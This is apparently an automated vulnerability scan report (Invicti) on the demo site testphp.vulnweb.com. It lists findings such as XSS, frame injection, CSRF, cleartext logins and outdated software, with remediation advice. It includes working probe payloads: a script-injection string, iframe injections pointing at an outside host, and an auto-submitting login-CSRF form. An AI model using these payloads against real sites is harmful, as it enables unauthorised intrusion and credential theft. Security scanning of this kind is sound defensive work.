Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts;packages
Acunetix-Aspect-ScanID: d0351b4b-e62d-417e-82fb-a118ba627995
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Invicti Standard identified you are using an out-of-date version of Nginx.
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
A security issue in nginx resolver was identified, which might allow an attacker who is able to forge UDP packets from the DNS server to cause 1-byte memory overwrite, resulting in worker process crash or potential other impact.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L
ALPACA is an application layer protocol content confusion attack, exploiting TLS servers implementing different protocols but using compatible certificates, such as multi-domain or wildcard certificates. A MiTM attacker having access to victim's traffic at the TCP/IP layer can redirect traffic from one subdomain to another, resulting in a valid TLS session. This breaks the authentication of TLS and cross-protocol attacks may be possible where the behavior of one protocol service may compromise the other at the application layer.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Please upgrade your installation of Nginx to the latest stable version.
PCI DSS v3.2 | 6.2 |
---|---|
PCI DSS v4.0 | 6.3.3 |
OWASP 2013 | A9 |
OWASP 2017 | A9 |
CWE | 1035, 937 |
CAPEC | 310 |
WASC | 13 |
HIPAA | 164.308(a)(1)(i) |
ASVS 4.0 | 1.14.3 |
NIST SP 800-53 | CM-6 |
DISA STIG | V-16836 |
OWASP Proactive Controls | C1 |
ISO27001 | A.14.1.2 |
ISO27001 2022 | A.8.19 |
OWASP Top Ten 2021 | A06 |
OWASP API Top 10 2023 | API8 |
Invicti Standard detected that password data is being transmitted over HTTP.
GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
PCI DSS v3.2 | 6.5.4 |
---|---|
PCI DSS v4.0 | 6.2.4 |
OWASP 2013 | A6 |
OWASP 2017 | A3 |
CWE | 319 |
CAPEC | 65 |
WASC | 4 |
ASVS 4.0 | 2.2.5 |
NIST SP 800-53 | SC-8 |
DISA STIG | V-16796 |
ISO27001 | A.14.1.3 |
ISO27001 2022 | A.8.5 |
ISO27001 2022 | A.8.24 |
ISO27001 2022 | A.8.27 |
ISO27001 2022 | A.8.3 |
OWASP Top Ten 2021 | A02 |
CVSS 3.0 SCORE | |
---|---|
Base | 5.7 (Medium) |
Temporal | 5.7 (Medium) |
Environmental | 5.7 (Medium) |
CVSS Vector String |
---|
CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 5.7 (Medium) |
Temporal | 5.7 (Medium) |
Environmental | 5.7 (Medium) |
CVSS Vector String |
---|
CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N |
CVSS 4.0 Score | |
---|---|
5.1 / Medium | |
Exploitability | Medium |
Complexity | High |
Vulnerable system | Low |
Subsequent system | Low |
Exploitation | High |
Security requirements | Medium |
CVSS Vector String |
---|
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N |
Invicti Standard detected Possible Cross-site Scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, an attacker might target an administrator and, by hijacking that session, gain full control over the application.
Although Invicti Standard believes there is a cross-site scripting here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | file | Querystring | '"--></style></scRipt><scRipt>netsparker(0x002932)</scRipt> |
GET | size | Querystring | 160 |
GET /showimage.php?file='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x002932)%3C/scRipt%3E&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.
There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and Microsoft Anti-Cross-site Scripting libraries.
Additionally, you should implement a strong Content Security Policy (CSP) as a defense-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS-Prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.
CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross-site Scripting vulnerabilities in your website and is advised in any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one.
PCI DSS v3.2 | 6.5.7 |
---|---|
PCI DSS v4.0 | 6.2.4 |
OWASP 2013 | A3 |
OWASP 2017 | A7 |
CWE | 79 |
CAPEC | 19 |
WASC | 8 |
HIPAA | 164.308(a) |
ASVS 4.0 | 5.3.3 |
NIST SP 800-53 | SI-15 |
DISA STIG | V-16811 |
ISO27001 | A.14.2.5 |
ISO27001 2022 | A.8.26 |
ISO27001 2022 | A.8.27 |
ISO27001 2022 | A.8.28 |
OWASP Top Ten 2021 | A03 |
CVSS 3.0 SCORE | |
---|---|
Base | 7.4 (High) |
Temporal | 7.4 (High) |
Environmental | 7.4 (High) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 7.4 (High) |
Temporal | 7.4 (High) |
Environmental | 7.4 (High) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N |
CVSS 4.0 Score | |
---|---|
5.1 / Medium | |
Exploitability | Medium |
Complexity | High |
Vulnerable system | Low |
Subsequent system | Low |
Exploitation | High |
Security requirements | Medium |
CVSS Vector String |
---|
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N |
Invicti Standard detected Frame Injection, which occurs when a frame on a vulnerable web page displays another web page via a user-controllable input.
An attacker might use this vulnerability to redirect users to other malicious websites that are used for phishing and similar attacks. Additionally they might place a fake login form in the frame, which can be used to steal credentials from your users.
It should be noted that attackers can also abuse injected frames in order to circumvent certain client side security mechanisms. Developers might overwrite functions to make it harder for attackers to abuse a vulnerability.
If an attacker uses a javascript: URL as src attribute of an iframe, the malicious JavaScript code is executed under the origin of the vulnerable website. However, it has access to a fresh window object without any overwritten functions.
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | p | Querystring | <iframe src="http://r87.com/?"></iframe> |
GET | pp | Querystring | 12 |
GET | aaaa%2f | Querystring |
GET /hpp/params.php?aaaa%2f=&p=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&pp=12 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | p | Querystring | valid |
GET | pp | Querystring | <iframe src="http://r87.com/?"></iframe> |
GET | aaaa%2f | Querystring |
GET /hpp/params.php?aaaa%2f=&p=valid&pp=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | artist | Querystring | <iframe src="http://r87.com/?"></iframe> |
GET /listproducts.php?artist=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/artists.php?artist=2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | cat | Querystring | <iframe src="http://r87.com/?"></iframe> |
GET /listproducts.php?cat=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | file | Querystring | <iframe src="http://r87.com/?"></iframe> |
GET | size | Querystring | 160 |
GET /showimage.php?file=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
PCI DSS v3.2 | 6.5.1 |
---|---|
PCI DSS v4.0 | 6.2.4 |
OWASP 2013 | A1 |
OWASP 2017 | A1 |
CWE | 601 |
WASC | 38 |
HIPAA | 164.308(a) |
ASVS 4.0 | 5.3.1 |
NIST SP 800-53 | SI-10 |
DISA STIG | V-6164 |
ISO27001 | A.14.2.5 |
ISO27001 2022 | A.8.26 |
ISO27001 2022 | A.8.27 |
ISO27001 2022 | A.8.28 |
OWASP Top Ten 2021 | A03 |
CVSS 3.0 SCORE | |
---|---|
Base | 4.7 (Medium) |
Temporal | 4.7 (Medium) |
Environmental | 4.7 (Medium) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 4.7 (Medium) |
Temporal | 4.7 (Medium) |
Environmental | 4.7 (Medium) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N |
CVSS 4.0 Score | |
---|---|
5.1 / Medium | |
Exploitability | Medium |
Complexity | High |
Vulnerable system | Low |
Subsequent system | Low |
Exploitation | High |
Security requirements | Medium |
CVSS Vector String |
---|
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N |
Invicti Standard detected JetBrains .idea project directory.
The .idea directory contains a set of configuration files (.xml) for your project. These configuration files contain information core to the project itself, such as the names and locations of its component modules, compiler settings, etc. If you've defined a data source, the file dataSources.ids contains information for connecting to the database, including credentials. The workspace.xml file stores personal settings such as the placement and positions of your windows, your VCS and History settings, and other data pertaining to the development environment. It also contains a list of changed files and other sensitive information. These files should not be present on a production system.
The .idea project directory contains sensitive information about the project, which might help an attacker compromise the system.
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | URI-BASED | FullUrl | /.idea/workspace.xml |
GET /.idea/workspace.xml HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Remove these files from production systems or restrict access to the .idea directory. To deny access to all the .idea folders you need to add the following lines in the appropriate context (either global config, or vhost/directory, or from .htaccess):
Order allow,deny
Deny from all
OWASP 2013 | A5 |
---|---|
OWASP 2017 | A6 |
CWE | 538 |
CAPEC | 118 |
WASC | 13 |
ASVS 4.0 | 12.5.1 |
NIST SP 800-53 | SC-4 |
DISA STIG | V-16814 |
OWASP Top Ten 2021 | A05 |
OWASP API Top 10 2023 | API3 |
CVSS 3.0 SCORE | |
---|---|
Base | 5.8 (Medium) |
Temporal | 5.8 (Medium) |
Environmental | 5.8 (Medium) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 5.8 (Medium) |
Temporal | 5.8 (Medium) |
Environmental | 5.8 (Medium) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N |
Invicti Standard detected an Open Policy Crossdomain.xml file.
GET /crossdomain.xml HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
OWASP 2013 | A5 |
---|---|
OWASP 2017 | A6 |
CWE | 16 |
WASC | 15 |
ASVS 4.0 | 14.5.2 |
NIST SP 800-53 | AC-22 |
DISA STIG | V-6141 |
OWASP API Top Ten 2019 | API7 |
ISO27001 | A.14.2.5 |
ISO27001 2022 | A.5.14 |
OWASP Top Ten 2021 | A05 |
CVSS 3.0 SCORE | |
---|---|
Base | 6.5 (Medium) |
Temporal | 6.2 (Medium) |
Environmental | 6.2 (Medium) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C |
CVSS 3.1 SCORE | |
---|---|
Base | 6.5 (Medium) |
Temporal | 6.2 (Medium) |
Environmental | 6.2 (Medium) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C |
Invicti Standard identified the target web site is using tinymce and detected that it is out of date.
TinyMCE 4.7.11 and 4.7.12 are affected by CWE-79: Improper Neutralization of Input During Web Page Generation. The impact is JavaScript code execution. The component is the Media element. The attack vector is that the victim must paste malicious content into the media element's embed tab.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
A cross-site scripting (XSS) vulnerability in TinyMCE 5.2.1 and earlier allows remote attackers to inject arbitrary web script when configured in classic editing mode.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
TinyMCE is an open source rich text editor. A cross-site scripting (XSS) vulnerability was discovered in the alert and confirm dialogs when these dialogs were provided with malicious HTML content. This can occur in plugins that use the alert or confirm dialogs, such as the `image` plugin, which presents these dialogs when certain errors occur. The vulnerability allowed arbitrary JavaScript execution when an alert was presented in the TinyMCE UI for the current user. This vulnerability has been patched in TinyMCE 5.10.7 and TinyMCE 6.3.1 by ensuring HTML sanitization was still performed after unwrapping invalid elements. Users are advised to upgrade to either 5.10.7 or 6.3.1. Users unable to upgrade may ensure that the `images_upload_handler` returns a valid value as per the images_upload_handler documentation.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
TinyMCE is an open source rich text editor. A mutation cross-site scripting (mXSS) vulnerability was discovered in TinyMCE’s core undo and redo functionality. When a carefully-crafted HTML snippet passes the XSS sanitisation layer, it is manipulated as a string by internal trimming functions before being stored in the undo stack. If the HTML snippet is restored from the undo stack, the combination of the string manipulation and reparative parsing by either the browser's native [DOMParser API](https://developer.mozilla.org/en-US/docs/Web/API/DOMParser) (TinyMCE 6) or the SaxParser API (TinyMCE 5) mutates the HTML maliciously, allowing an XSS payload to be executed. This vulnerability has been patched in TinyMCE 5.10.8 and TinyMCE 6.7.1 by ensuring HTML is trimmed using node-level manipulation instead of string manipulation. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
TinyMCE is an open source rich text editor. A cross-site scripting (XSS) vulnerability was discovered in TinyMCE's Notification Manager API. The vulnerability exploits TinyMCE's unfiltered notification system, which is used in error handling. The conditions for this exploit require carefully crafted malicious content to have been inserted into the editor and a notification to have been triggered. When a notification was opened, the HTML within the text argument was displayed unfiltered in the notification. The vulnerability allowed arbitrary JavaScript execution when a notification was presented in the TinyMCE UI for the current user. This issue could also be exploited by any integration which uses a TinyMCE notification to display unfiltered HTML content. This vulnerability has been patched in TinyMCE 5.10.8 and TinyMCE 6.7.1 by ensuring that the HTML displayed in the notification is sanitized, preventing the exploit. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
TinyMCE is an open source rich text editor. A mutation cross-site scripting (mXSS) vulnerability was discovered in TinyMCE's core undo/redo functionality and other APIs and plugins. Text nodes within specific parents are not escaped upon serialization according to the HTML standard. If such text nodes contain a special character reserved as an internal marker, they can be combined with other HTML patterns to form malicious snippets. These snippets pass the initial sanitisation layer when the content is parsed into the editor body, but can trigger XSS when the special internal marker is removed from the content and re-parsed. This vulnerability has been patched in TinyMCE versions 6.7.3 and 5.10.9. Users are advised to upgrade. There are no known workarounds for this vulnerability.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts;packages
Acunetix-Aspect-ScanID: d0351b4b-e62d-417e-82fb-a118ba627995
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Invicti Standard detected that the session.use_only_cookies PHP directive is disabled.
The session.use_only_cookies PHP directive makes PHP send session IDs exclusively in cookies, as opposed to appending them to the URL. While passing the session ID in the URL may have the perceived security benefit of preventing Cross-site Request Forgery (CSRF) vulnerabilities, it actually leads to dangerous session-related vulnerabilities, such as session hijacking and session fixation. Session IDs may end up in log files or can be leaked via the Referer header or by other means. Additionally, attackers can trick victims into logging into the attacker's own account.
Method | Parameter | Parameter Type | Value |
---|---|---|---|
GET | URI-BASED | FullUrl | phpinfo.php |
GET /secured/phpinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
You can enable session.use_only_cookies from php.ini or .htaccess.
session.use_only_cookies = 'on'
php_flag session.use_only_cookies on
In order to prevent session IDs from being passed in the URL, enable session.use_only_cookies in your php.ini or .htaccess file.
OWASP 2013 | A5 |
---|---|
OWASP 2017 | A6 |
CWE | 598 |
ASVS 4.0 | 3.1.1 |
NIST SP 800-53 | CM-6 |
DISA STIG | V-16786 |
OWASP API Top Ten 2019 | API7 |
ISO27001 2022 | A.8.9 |
OWASP Top Ten 2021 | A05 |
OWASP API Top 10 2023 | API8 |
CVSS 3.0 SCORE | |
---|---|
Base | 8.1 (High) |
Temporal | 8.1 (High) |
Environmental | 8.1 (High) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 8.1 (High) |
Temporal | 8.1 (High) |
Environmental | 8.1 (High) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N |
CVSS 4.0 Score | |
---|---|
5.1 / Medium | |
Exploitability | Medium |
Complexity | High |
Vulnerable system | Low |
Subsequent system | Low |
Exploitation | High |
Security requirements | Medium |
CVSS Vector String |
---|
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N |
Invicti Standard detected that SSL/TLS is not implemented after trying to establish a secure connection to the target website.
An attacker who is able to intercept your - or your users' - network traffic can read and modify any messages that are exchanged with your server.
That means that an attacker can see passwords in clear text, modify the appearance of your website, redirect the user to other web pages or steal session information.
Therefore no message you send to the server remains confidential.
[SSL Connection]
We suggest that you implement SSL/TLS properly, for example by using the Certbot tool provided by the Let's Encrypt certificate authority. It can automatically configure most modern web servers, e.g. Apache and Nginx to use SSL/TLS. Both the tool and the certificates are free and are usually installed within minutes.
PCI DSS v3.2 | 6.5.4 |
---|---|
PCI DSS v4.0 | 6.2.4 |
OWASP 2013 | A6 |
OWASP 2017 | A3 |
CWE | 311 |
CAPEC | 217 |
WASC | 4 |
HIPAA | 164.306 |
ASVS 4.0 | 9.1.1 |
NIST SP 800-53 | SC-8 |
DISA STIG | V-6136 |
OWASP API Top Ten 2019 | API7 |
ISO27001 | A.14.1.3 |
ISO27001 2022 | A.5.14 |
ISO27001 2022 | A.8.27 |
OWASP Top Ten 2021 | A02 |
OWASP API Top 10 2023 | API8 |
CVSS 3.0 SCORE | |
---|---|
Base | 6.8 (Medium) |
Temporal | 6.1 (Medium) |
Environmental | 6.1 (Medium) |
CVSS Vector String |
---|
CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C |
CVSS 3.1 SCORE | |
---|---|
Base | 6.8 (Medium) |
Temporal | 6.1 (Medium) |
Environmental | 6.1 (Medium) |
CVSS Vector String |
---|
CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C |
CVSS 4.0 Score | |
---|---|
5.1 / Medium | |
Exploitability | Medium |
Complexity | High |
Vulnerable system | Low |
Subsequent system | Low |
Exploitation | High |
Security requirements | Medium |
CVSS Vector String |
---|
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N |
Invicti Standard identified a possible Cross-Site Request Forgery.
CSRF is a very common vulnerability. It's an attack which forces a user to execute unwanted actions on a web application in which the user is currently authenticated.
GET /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Send additional information in each HTTP request that can be used to determine whether the request came from an authorized source. This "validation token" should be hard to guess for an attacker who does not already have access to the user's account. If a request is missing a validation token or the token does not match the expected value, the server should reject the request.
If you are posting a form in an AJAX request, custom HTTP headers can be used to prevent CSRF, because the browser prevents sites from sending custom HTTP headers to another site but allows sites to send custom HTTP headers to themselves using XMLHttpRequest.
xhr = new XMLHttpRequest();
xhr.open('POST', 'foo/bar');
xhr.setRequestHeader('custom-header', 'value');
For jQuery, if you want to add a custom header (or set of headers) to:
a. individual request
$.ajax({ url: 'foo/bar', headers: { 'x-my-custom-header': 'some value' } });
b. every request
$.ajaxSetup({ headers: { 'x-my-custom-header': 'some value' } }); OR $.ajaxSetup({ beforeSend: function(xhr) { xhr.setRequestHeader('x-my-custom-header', 'some value'); } });
Invicti Standard identified a possible Cross-Site Request Forgery in Login Form.
In a login CSRF attack, the attacker forges a login request to an honest site using the attacker’s user name and password at that site. If the forgery succeeds, the honest server responds with a Set-Cookie header that instructs the browser to mutate its state by storing a session cookie, logging the user into the honest site as the attacker. This session cookie is used to bind subsequent requests to the user’s session and hence to the attacker’s authentication credentials. The attacker can later log into the site with his legitimate credentials and view private information like activity history that has been saved in the account.
In this particular case, CSRF affects the login form, which significantly reduces the impact of this vulnerability. Unlike normal CSRF vulnerabilities, it only allows an attacker to exploit certain complex XSS vulnerabilities; otherwise it cannot be exploited.
For example:
If there is a page that is different for every user (such as "edit my profile") and is vulnerable to XSS (Cross-site Scripting), then normally it cannot be exploited. However, if the login form is vulnerable, an attacker can prepare a special profile and force the victim to log in as that user, which will trigger the XSS exploit. Again, the attacker is still quite limited with this XSS, as there is no active session. However, the attacker can leverage this XSS in many ways, such as showing the same login form again, but this time capturing the entered username/password and sending it to the attacker.
In this kind of attack, the attacker will send a link containing HTML as simple as the following, in which the attacker's user name and password are attached.
<form method="POST" action="http://honest.site/login"> <input type="text" name="user" value="h4ck3r" /> <input type="password" name="pass" value="passw0rd" /> </form> <script> document.forms[0].submit(); </script>
When the victim clicks the link, the form will be submitted automatically to the honest site. If exploitation is successful, the victim will be logged in as the attacker, and the consequences will depend on the website's behavior.
Many sites allow their users to opt in to saving their search history and provide an interface for a user to review his or her personal search history. Search queries contain sensitive details about the user's interests and activities and could be used by the attacker to embarrass the user, to steal the user's identity, or to spy on the user. Since the victim logs in as the attacker, the victim's search queries are then stored in the attacker's search history, and the attacker can retrieve the queries by logging into his or her own account.
Merchant sites might save credit card details in the user's profile. In a login CSRF attack, when the user funds a purchase and enrolls the credit card, the credit card details might be added to the attacker's account.
GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Send additional information in each HTTP request that can be used to determine whether the request came from an authorized source. This "validation token" should be hard to guess for an attacker who does not already have access to the user's account. If a request is missing a validation token or the token does not match the expected value, the server should reject the request.
If you are posting a form in an AJAX request, custom HTTP headers can be used to prevent CSRF, because the browser prevents sites from sending custom HTTP headers to another site but allows sites to send custom HTTP headers to themselves using XMLHttpRequest.
xhr = new XMLHttpRequest();
xhr.open('POST', 'foo/bar');
xhr.setRequestHeader('custom-header', 'value');
For jQuery, if you want to add a custom header (or set of headers) to:
a. individual request
$.ajax({ url: 'foo/bar', headers: { 'x-my-custom-header': 'some value' } });
b. every request
$.ajaxSetup({ headers: { 'x-my-custom-header': 'some value' } }); OR $.ajaxSetup({ beforeSend: function(xhr) { xhr.setRequestHeader('x-my-custom-header', 'some value'); } });
